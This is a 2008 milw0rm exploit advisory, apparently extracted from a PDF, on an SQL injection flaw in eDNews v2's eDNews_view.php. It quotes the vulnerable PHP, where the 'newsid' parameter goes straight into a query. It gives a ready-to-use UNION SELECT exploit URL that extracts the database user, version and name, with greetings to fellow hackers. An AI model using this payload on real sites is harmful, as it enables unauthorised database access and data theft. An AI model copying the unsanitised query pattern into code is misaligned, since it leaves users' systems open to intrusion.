eDNews v2 eDNews_view.php newsid SQL Injection Vulnerability.pdf

1 ####################################################################################### 2 # # 3 # ...:::::eDNews v2 SQL Injection Vulnerability::::.... # 4 ####################################################################################### 5 Virangar Security Team 6 www.virangar.net 7 −−−−−−−− 8 Discoverd By :virangar security team(hadihadi) 9 special tnx to:MR.nosrati,black.shadowes,MR.hesy,Ali007,Zahra 10 & all virangar members & all hackerz 11 greetz:to my best friend in the world hadi_aryaie2004 12 & my lovely friend arash(imm02tal) 13 −−−−−−− 14 vuln code in eDNews_view.php: 15 line 22−23: 16 if ( isset( $_REQUEST[’newsid’] ) ) { 17 ${$CONFIG[’fld_id’]} = $_REQUEST[’newsid’]; 18 .... 19 line 42−46: 20 $arr_select = array( $CONFIG[’fld_id’], ’’.$CONFIG[’fld_title’].’’, ’’.$CONFIG[’fld_content’].’’,’’.$CONFIG[’fld_date Created’].’’,’’.$CONFIG[’fld_score’] .’’); 21 $arr_from = array($CONFIG[’table’]); 22 $where = $CONFIG[’fld_id’].’ = ’.${$CONFIG[’fld_id’]}; 23 $eDQuery_ = new edQuery( $dblink, $CONFIG[’db’], $arr_from, $arr_select, $where, null, ’extended’, $CONFIG[’debug’], null, ’1’ ); 24 $arr_rst = $eDQuery_−>getRecords(); 25 −−− 26 exploit: 27 http://site.com/eDNews_view.php?newsid=−99/**/union/**/select/**/1,2,concat(user(),0x3a,version(),0x3e,database()),4, 5/* 28 −−−−−−− 29 young iranian h4ck3rz 30 31 # milw0rm.com [2008−12−29] Page 1/1 eDNews v2 eDNews_view.php newsid SQL Injection Vulnerability Virangar Security 12/29/2008